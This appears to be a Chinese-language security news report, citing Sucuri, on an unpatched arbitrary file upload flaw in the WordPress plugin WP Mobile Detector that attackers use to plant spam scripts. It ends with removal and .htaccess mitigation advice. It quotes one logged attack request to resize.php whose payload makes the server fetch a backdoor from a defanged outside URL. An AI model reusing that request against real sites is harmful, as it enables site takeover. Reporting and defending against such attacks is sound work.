最近,Sucuri的安全专家们发现了一个令人担忧的情况,WordPress里一个名为WP移动探测器的插件里竟然有个漏洞,黑客们正在利用这个漏洞对越来越多的WordPress网站进行攻击。而更糟糕的是,现在还没有可以修复这个漏洞的补丁。
据专家分析,黑客们主要是通过这个插件中的漏洞,来植入与色情相关的垃圾邮件脚本。
自从这个漏洞被曝光后,WP移动探测器插件已经被从WordPress的官方插件目录中撤下了。
在Sucuri的一篇博客中提到:我们的研究团队深入调查后发现,很多受到攻击的WordPress网站都有一个共同点,就是它们都使用了那个在5月31日被曝光的任意文件上传的0-day漏洞。虽然这个插件已经被下架,但目前依然没有可用的修复补丁。“这个漏洞早在5月31日就已经被披露,但根据我们的防火墙日志,自5月27日就开始有攻击行为了。”
这款插件的安装量已经超过了10000个,许多用户仍然面临着网络攻击的风险。
这个漏洞的存在导致了插件的输入验证失败,攻击者可以借此提交恶意的PHP代码到服务器。
“这个漏洞相当容易被利用。”Sucuri的报告指出,“攻击者只需向resize.php或timthumb.php发送请求,就能将后门软件的URL放到插件目录中。”
这里有一个我们检测到的攻击负载:
188.73.152.166 – – [31/May/2016:23:54:43 -0400] “POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php”
专家们提醒,由于目前没有可用的修复补丁,因此最明智的选择就是卸载这个有问题的WP移动探测器插件。
“我们强烈建议大家删除这个插件。如果你真的需要使用它,可以临时通过在wp移动目录或缓存目录中禁用PHP执行来规避风险,例如在.htaccess文件中加上这段代码。”
deny from all
